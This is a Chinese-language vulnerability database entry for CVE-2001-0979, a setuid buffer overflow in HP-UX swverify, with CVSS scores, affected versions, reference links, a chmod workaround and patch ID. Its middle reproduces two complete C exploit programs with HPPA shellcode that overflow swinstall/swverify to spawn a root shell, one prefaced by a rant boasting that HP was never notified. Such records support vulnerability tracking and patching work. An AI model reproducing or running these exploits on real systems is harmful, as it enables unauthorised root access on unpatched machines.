CVE-2001-0979
CVSS7.2
发布时间 :2001-09-03 00:00:00
修订时间 :2008-09-05 16:25:23
NMCOES    

[原文]Buffer overflow in swverify in HP-UX 11.0, and possibly other programs, allows local users to gain privileges via a long command line argument.


[CNNVD]HP-UX SWVerify 缓冲区溢出漏洞(CNNVD-200109-004)

        CVE(CAN) ID: CAN-2001-0979
        
        
        
        HP-UX是由Hewlett-Packard发布的UNIX操作系统的一个变种,应用非常广泛。
        
        
        
        HP-UX所带的"SWVerify"程序存在缓冲区溢出漏洞,如果我们提交一个6039字节的参数给
        
        这个程序就会导致缓冲区溢出。由于该程序是setuid的,所以我们可以利用这个程序提
        
        升权限,甚至获得root权限。
        
        
        
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/o:hp:hp-ux:10.10HP HP-UX 10.10
cpe:/o:hp:hp-ux:10.20HP HP-UX 10.20
cpe:/o:hp:hp-ux:10.01HP HP-UX 10.01

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0979
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0979
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200109-004
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/7078.php
(VENDOR_ADVISORY)  XF  hpux-swverify-bo(7078)
http://www.securityfocus.com/bid/3279
(VENDOR_ADVISORY)  BID  3279
http://www.securityfocus.com/archive/1/211687
(UNKNOWN)  BUGTRAQ  20010903 hpux warez

- 漏洞信息

HP-UX SWVerify 缓冲区溢出漏洞
高危 边界条件错误
2001-09-03 00:00:00 2005-10-20 00:00:00
本地  
        CVE(CAN) ID: CAN-2001-0979
        
        
        
        HP-UX是由Hewlett-Packard发布的UNIX操作系统的一个变种,应用非常广泛。
        
        
        
        HP-UX所带的"SWVerify"程序存在缓冲区溢出漏洞,如果我们提交一个6039字节的参数给
        
        这个程序就会导致缓冲区溢出。由于该程序是setuid的,所以我们可以利用这个程序提
        
        升权限,甚至获得root权限。
        
        
        
        

- 公告与补丁

        
        
        临时解决方法:
        
        
        
        在安装升级补丁之前,我们建议你暂时去掉该程序的setuid位:
        
        
        
        #chmod a-s `which swverify`
        
        
        
        厂商补丁:
        
        
        
        厂商已经为此漏洞提供了补丁程序,补丁代码是:PHCO_23483
        
        
        
        我们建议使用此软件的用户从厂商的主页上获取相应补丁:
        
        
        http://www.hp.com/products1/unix/

        
        
        

- 漏洞信息 (482)

HP-UX 11.0/11.11 swxxx Local Root Shell Exploit (EDBID:482)
hp-ux local
2002-12-11 Verified
0 watercloud
N/A [点击下载]
/*
 Program : x_hpux_11i_sw.c
 Use     : HP-UX 11.11/11.0 exploit swxxx to get local root shell.
 Complie : cc x_hpux_11i_sw.c -o x_sw;./x_sw  ( not use gcc for some system)
 Usage   : ./x_sw [ off ]
 Tested  : HP-UX B11.11 & HP-UX B11.0
 Author  : watercloud [@] xfocus.org
 Date    : 2002-12-11
 Note    : Use as your own risk !!
*/
#include<stdio.h>
#define T_LEN  2124
#define BUFF_LEN 1688
#define NOP 0x0b390280
char shellcode[]=
 "\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08" 
 "\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
 "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16"
 "/bin/shA";

long addr;
char buffer_env[2496];
char buffer[T_LEN];

void main(argc,argv)
int argc;
char ** argv;
{
   int addr_off = 8208;
   long addr_e = 0;
   int  n=BUFF_LEN/4,i=0;
   long * ap = (long *) &buffer[BUFF_LEN];
   char * sp = &buffer[BUFF_LEN-strlen(shellcode)];
   long * np = (long *) buffer;
   if(argc >0)
       addr_off += atoi(argv[1]);
   addr = ( (long) &addr_off +addr_off) /4 * 4  +4;
   for(i=0;i<n;np[i++]=NOP);
   memcpy(sp,shellcode,strlen(shellcode));
   for(i=0;i<(T_LEN-BUFF_LEN)/4;ap[i++]=addr);
   buffer[T_LEN -2 ] += 1; buffer[T_LEN - 1 ] = '\0';
   sprintf(buffer_env,"LANG=AAA%s",buffer);
   putenv(buffer_env);
   execl("/usr/sbin/swinstall","swinstall","/tmp/null",NULL);
    /* if  false ,test swverify. */
   execl("/usr/sbin/swverify","swverify",NULL);
}

// milw0rm.com [2002-12-11]
		

- 漏洞信息 (21098)

HP-UX 11.0 SWVerify Buffer Overflow Vulnerability (EDBID:21098)
hp-ux local
2001-09-03 Verified
0 foo
N/A [点击下载]
source: http://www.securityfocus.com/bid/3279/info

HP-UX is the UNIX Operating System variant distributed by Hewlett-Packard, available for use on systems of size varying from workgroup servers to enterprise systems.

A problem has been discovered in the operating system that can allow a local user to gain elevated privileges. swverify contains a buffer overflow which is exploitable upon receiving 6039 bytes as an argument. The swverify program is setuid root, which allows a local user to execute code as root, potentially gaining administrative access to the vulnerable system.

/*

  Copyright FOO
  This code may be distributed freely so long as it is kept in its entirety.


http://www.counterpane.com/crypto-gram-0108.html#1

  "I have long said that the Internet is too complex to secure.  One of the
  reasons is that it is too complex to understand."

  "It's the authors of the worm and its variants, eEye for publicizing the
   vulnerability, and especially Microsoft for selling a product with this
   security problem."

Didn't you just say that the Internet is too complex to even understand let
alone secure?  And now it's Microsoft's fault.  How should they be able to
magically know all the answers?  Oh, I know, security is a process...

  "If software companies were held liable for systematic problems in
  its products, just like other industries (remember Firestone tires), we'd
  see a whole lot less of this kind of thing."

Yes, I remember Firestone tires.  Bridgestone/Firestone Inc. sold people
a bunch of faulty tires.  The wheel is certainly not "too complex to
understand".  After all, we've had 5000 years of R&D time; the public
expects products that work right.  Web servers, on the other hand, are
a somewhat newer invention.  Thanks for the phony analogy, Bruce.


  "You can argue that eEye did the right thing by publicizing this
  vulnerability, but I personally am getting a little tired of them adding
  weapons to hackers' arsenals. I support full disclosure and believe that
  it has done a lot to improve security, but eEye is going too far."

I could go into the whole full disclosure debate, but I'd honestly rather
get a root canal.  Instead, I'll just point out how wrong you are.  How can
you support full disclosure and not support eEye fully disclosing this issue
to the public?  More importantly, why do you even care?  The debate is over,
full disclosure died when Jeff Moss started blackhat, bugtraq went corporate,
and @stake bought the scene.  The community at large has already rejected
full disclosure. Anyone who thinks otherwise is naive.  In reality the so
called blackhats find most of the holes and only share them with their
friends.  Everyone can argue the pros and cons of full disclosure and try
to start up hopeless little private 0 day clubs for vendors and "authorized"
researchers until hell freezes over, or Microsoft releases a quality product.
In the end, it's just a bunch of people who don't know, arguing with the
bunch who don't get it.  Blame eEye and Microsoft all you want if it makes
you feel better.  If you bitch at them long enough they might just join the
rest of the real researchers out there who don't do public disclosure and
only report to known and trusted peers.  (read: other blackhats)

The real problem here is that the clueless have convinced themselves that the
computer security underground is nothing more than packs of socially
challenged adolescent boys running around with proof of concept exploit code
written by whitehats.  Some have even deluded themselves into thinking that
they should be the ones who are the gate keepers of vulnerability info.
(Russ Cooper comes to mind.) Congratulations, the war is over.  You won.  The
public is now either defenseless or paying by the hour.

Don't bite the hand that feeds you or you won't get any more scraps from
the table.

I will leave you with this HPUX 11 local root exploit code. /usr/sbin/sw*
are all setuid root by default and all contain buffer overflows. I didn't
bother notifying HP about this at all. I just don't give a fuck.

*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH 10102
#define STACK_OFFSET 0
#define EXTRA 4000
#define HPPA_NOP 0x3902800b //0x0b390280

u_char hppa_shellcode[] =
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff\xff\xff";

u_long get_sp(void)
{
   __asm__("copy %sp,%ret0 \n");
}

int main(int argc, char *argv[])
{
   char buf[BUF_LENGTH+8];
   unsigned long targ_addr,other_addr;
   u_long *long_p;
   u_char *char_p;
   int i, code_length = strlen(hppa_shellcode),dso=STACK_OFFSET,xtra=EXTRA;

   if(argc > 1) dso+=atoi(argv[1]);
   if(argc > 2) xtra+=atoi(argv[2]);

   long_p = (u_long *) buf;

   for (i = 0; i < (BUF_LENGTH - code_length - xtra) / sizeof(u_long); i++)
     *long_p++ = HPPA_NOP;

   char_p = (u_char *) long_p;

   for (i = 0; i < code_length; i++)
     *char_p++ = hppa_shellcode[i];

   targ_addr = get_sp() - dso;

   for (i = 0; i < xtra /4; i++)
   {
      *char_p++ =(targ_addr>>24)&255;
      *char_p++ =(targ_addr>>16)&255;
      *char_p++ =(targ_addr>>8)&255;
      *char_p++ =(targ_addr)&255;
    }

   printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",targ_addr,strlen(buf), xtra,dso);
   execl("/usr/sbin/swverify","swverify", buf,(char *) 0);
   perror("execl failed");
   return(-1);
}
		

- 漏洞信息

9620
HP-UX swverify Command Line Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-09-03 Unknow
2001-09-03 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

HP-UX SWVerify Buffer Overflow Vulnerability
Boundary Condition Error 3279
No Yes
2001-09-03 12:00:00 2009-07-11 07:56:00
This vulnerability was announced via the Bugtraq mailing list by <auto300526@hushmail.com> on September 3, 2001.

- 受影响的程序版本

HP HP-UX 11.0

- 漏洞讨论

HP-UX is the UNIX Operating System variant distributed by Hewlett-Packard, available for use on systems of size varying from workgroup servers to enterprise systems.

A problem has been discovered in the operating system that can allow a local user to gain elevated privileges. swverify contains a buffer overflow which is exploitable upon receiving 6039 bytes as an argument. The swverify program is setuid root, which allows a local user to execute code as root, potentially gaining administrative access to the vulnerable system.

- 漏洞利用

Contributed by &lt;auto300526@hushmail.com&gt;:

- 解决方案

HP has released a fix:


HP HP-UX 11.0

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站